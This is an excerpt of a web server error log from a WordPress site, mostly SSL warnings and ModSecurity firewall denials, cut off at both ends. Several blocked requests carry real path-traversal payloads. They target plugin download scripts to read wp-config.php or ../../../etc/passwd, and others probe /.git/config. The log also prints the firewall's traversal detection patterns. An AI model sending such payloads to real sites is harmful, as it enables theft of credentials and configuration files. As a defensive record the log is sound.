/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtl&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php"] [unique_id "YzhYDCaQuK6EVYWjtq8dgwAAANg"] [Sat Oct 01 10:09:03.876219 2022] [:error] [pid 15924:tid 139812744894208] [client 37.115.193.107:43932] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php"] [unique_id "YzhYD4ISLyW7RiiuwKU9LQAAAFc"] [Sat Oct 01 10:09:06.634824 2022] [:error] [pid 15924:tid 139812736501504] [client 37.115.193.107:43936] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php"] [unique_id "YzhYEoISLyW7RiiuwKU9LgAAAFg"] [Sat Oct 01 10:09:09.835077 2022] [:error] [pid 15924:tid 139812795250432] [client 37.115.193.107:43942] [client 37.115.193.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php"] [unique_id "YzhYFYISLyW7RiiuwKU9MAAAAFE"] [Sun Oct 02 00:28:50.286895 2022] [:error] [pid 16238:tid 139812778465024] [client 5.188.62.174:43496] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YzkhkiaQuK6EVYWjtq8uUwAAANM"] [Sun Oct 02 03:27:17.061727 2022] [ssl:warn] [pid 15713:tid 139769690126208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 02 03:27:17.177223 2022] [ssl:warn] [pid 15714:tid 139769690126208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 02 03:27:17.564360 2022] [ssl:warn] [pid 15714:tid 139769690126208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 02 03:27:19.836849 2022] [ssl:warn] [pid 15714:tid 139769690126208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 02 03:27:22.189615 2022] [ssl:warn] [pid 16140:tid 140686500042624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 02 03:27:22.326592 2022] [ssl:warn] [pid 16141:tid 140686500042624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 02 23:18:51.123177 2022] [autoindex:error] [pid 16158:tid 140686294263552] [client 57.128.45.42:42644] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/09/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Oct 03 03:26:19.105592 2022] [ssl:warn] [pid 23536:tid 139883508799360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 03 03:26:19.220155 2022] [ssl:warn] [pid 23537:tid 139883508799360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 03 03:26:19.744692 2022] [ssl:warn] [pid 23537:tid 139883508799360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 03 03:26:21.372244 2022] [ssl:warn] [pid 23537:tid 139883508799360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 03 03:26:23.640784 2022] [ssl:warn] [pid 23961:tid 140557606115200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 03 03:26:23.769344 2022] [ssl:warn] [pid 23962:tid 140557606115200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 03 10:25:40.661676 2022] [:error] [pid 23984:tid 140557275875072] [client 5.188.62.21:48776] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yzr-9Coh7AqfZireTolaZgAAAIk"] [Mon Oct 03 10:41:30.474320 2022] [:error] [pid 24684:tid 140557191948032] [client 5.188.62.174:48994] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YzsCqjcGO7hbtn99W1jZgAAAANM"] [Mon Oct 03 14:59:01.536287 2022] [:error] [pid 23982:tid 140557166769920] [client 5.188.62.140:57256] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yzs_BfWBYplruwSdZB7H0AAAABY"] [Mon Oct 03 15:36:50.829090 2022] [:error] [pid 23982:tid 140557166769920] [client 41.216.188.218:33856] [client 41.216.188.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YztH4vWBYplruwSdZB7H6wAAABY"], referer: www.google.com [Mon Oct 03 15:58:48.287126 2022] [:error] [pid 23982:tid 140557383550720] [client 5.188.62.26:35652] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YztNCPWBYplruwSdZB7H-QAAAAU"] [Mon Oct 03 17:35:41.700912 2022] [:error] [pid 24684:tid 140557233911552] [client 5.188.62.76:45976] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YztjvTcGO7hbtn99W1jdGgAAAM4"] [Mon Oct 03 19:03:33.127420 2022] [ssl:warn] [pid 23962:tid 140557606115200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 04 03:26:17.393839 2022] [ssl:warn] [pid 5626:tid 139869482469248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 04 03:26:17.525488 2022] [ssl:warn] [pid 5627:tid 139869482469248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 04 03:26:18.004554 2022] [ssl:warn] [pid 5627:tid 139869482469248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 04 03:26:20.231340 2022] [ssl:warn] [pid 5627:tid 139869482469248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 04 03:26:22.507540 2022] [ssl:warn] [pid 6049:tid 139798423697280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 04 03:26:22.644212 2022] [ssl:warn] [pid 6050:tid 139798423697280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 04 03:47:18.567012 2022] [:error] [pid 6072:tid 139797972551424] [client 5.188.62.174:58172] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YzvzFg0Gwlf6-0-vLdbWIAAAABg"] [Tue Oct 04 07:51:31.821167 2022] [:error] [pid 6790:tid 139798106834688] [client 41.216.188.218:41884] [client 41.216.188.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YzwsUzWda_FjETmIaTlYUwAAAMg"], referer: www.google.com [Tue Oct 04 16:21:11.834882 2022] [:error] [pid 6790:tid 139798031300352] [client 5.188.62.21:54948] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YzyjxzWda_FjETmIaTldNgAAANE"] [Tue Oct 04 22:36:50.802078 2022] [:error] [pid 6790:tid 139798073263872] [client 5.188.62.26:33708] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yzz70jWda_FjETmIaTlgSwAAAMw"] [Tue Oct 04 22:36:53.174615 2022] [:error] [pid 6074:tid 139798031300352] [client 5.188.62.140:33710] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yzz71ZAAQSBneO3AHmfY9QAAAJE"] [Wed Oct 05 02:18:03.882501 2022] [:error] [pid 6790:tid 139798157190912] [client 5.188.62.76:37736] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yz0vqzWda_FjETmIaTliHwAAAMI"] [Wed Oct 05 03:23:22.918229 2022] [ssl:warn] [pid 26098:tid 140205254854528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 05 03:23:23.063607 2022] [ssl:warn] [pid 26099:tid 140205254854528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 05 03:23:23.762552 2022] [ssl:warn] [pid 26099:tid 140205254854528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 05 03:23:25.608509 2022] [ssl:warn] [pid 26099:tid 140205254854528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 05 03:23:27.888011 2022] [ssl:warn] [pid 26519:tid 140149300115328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 05 03:23:28.014506 2022] [ssl:warn] [pid 26520:tid 140149300115328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/10/05 16:50:15 [error] 26402#26402: *279967 access forbidden by rule, client: 212.23.222.167, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2022/10/05 16:50:15 [error] 26401#26401: *279986 access forbidden by rule, client: 212.23.222.167, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/10/05 16:50:20 [error] 26401#26401: *280019 access forbidden by rule, client: 212.23.222.167, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Oct 06 02:43:32.607013 2022] [autoindex:error] [pid 27696:tid 140148884834048] [client 41.216.188.48:38736] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Oct 06 03:22:46.780057 2022] [ssl:warn] [pid 14273:tid 139650862585728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 06 03:22:46.919533 2022] [ssl:warn] [pid 14274:tid 139650862585728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 06 03:22:47.455046 2022] [ssl:warn] [pid 14274:tid 139650862585728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 06 03:22:49.175317 2022] [ssl:warn] [pid 14274:tid 139650862585728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 06 03:22:51.497057 2022] [ssl:warn] [pid 14696:tid 139854704084864] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 06 03:22:51.611989 2022] [ssl:warn] [pid 14697:tid 139854704084864] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Oct 06 05:38:50.472942 2022] [autoindex:error] [pid 14715:tid 139854360848128] [client 41.216.188.48:48070] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Oct 06 16:50:10.463482 2022] [autoindex:error] [pid 14716:tid 139854377633536] [client 20.125.120.85:39842] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2022/10/07 03:11:29 [error] 14574#14574: *330883 connect() failed (111: Connection refused) while connecting to upstream, client: 20.83.147.176, server: investigacionperu.com, request: "POST //xmlrpc.php HTTP/1.1", upstream: "http://198.199.72.26:8181//xmlrpc.php", host: "investigacionperu.com:443" [Fri Oct 07 03:11:29.520119 2022] [ssl:warn] [pid 24759:tid 140505263077248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Oct 07 03:11:29.640944 2022] [ssl:warn] [pid 24760:tid 140505263077248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Oct 07 03:11:29.988590 2022] [ssl:warn] [pid 24760:tid 140505263077248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Oct 07 03:11:31.989099 2022] [ssl:warn] [pid 24760:tid 140505263077248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Oct 07 03:11:34.241269 2022] [ssl:warn] [pid 25181:tid 140369594808192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Oct 07 03:11:34.353092 2022] [ssl:warn] [pid 25182:tid 140369594808192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Oct 07 05:40:06.791882 2022] [autoindex:error] [pid 25201:tid 140369169663744] [client 57.128.45.42:49086] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 07 20:11:05.976367 2022] [:error] [pid 25846:tid 140369220019968] [client 5.188.62.174:42798] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y0DOKbZeHPln6XnoYWXr3wAAAM8"] [Sat Oct 08 01:20:22.266853 2022] [autoindex:error] [pid 25846:tid 140369270376192] [client 198.27.68.131:49334] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php?673435=1 [Sat Oct 08 03:42:15.960373 2022] [ssl:warn] [pid 6042:tid 139625462318976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 08 03:42:16.104840 2022] [ssl:warn] [pid 6043:tid 139625462318976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 08 03:42:16.457841 2022] [ssl:warn] [pid 6043:tid 139625462318976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 08 03:42:18.514820 2022] [ssl:warn] [pid 6043:tid 139625462318976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 08 03:42:20.773686 2022] [ssl:warn] [pid 6468:tid 139836387788672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 08 03:42:20.905120 2022] [ssl:warn] [pid 6469:tid 139836387788672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 08 19:03:36.550404 2022] [ssl:warn] [pid 6469:tid 139836387788672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Oct 08 19:33:01.771848 2022] [autoindex:error] [pid 29625:tid 139836065306368] [client 57.128.19.96:49686] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/09/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 08 20:41:52.692282 2022] [:error] [pid 29885:tid 139836182009600] [client 5.188.62.26:51516] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y0Im4AOvovS0nVHR09DDYgAAAQM"] [Sat Oct 08 20:49:08.832486 2022] [:error] [pid 29885:tid 139836056913664] [client 113.174.206.2:51726] 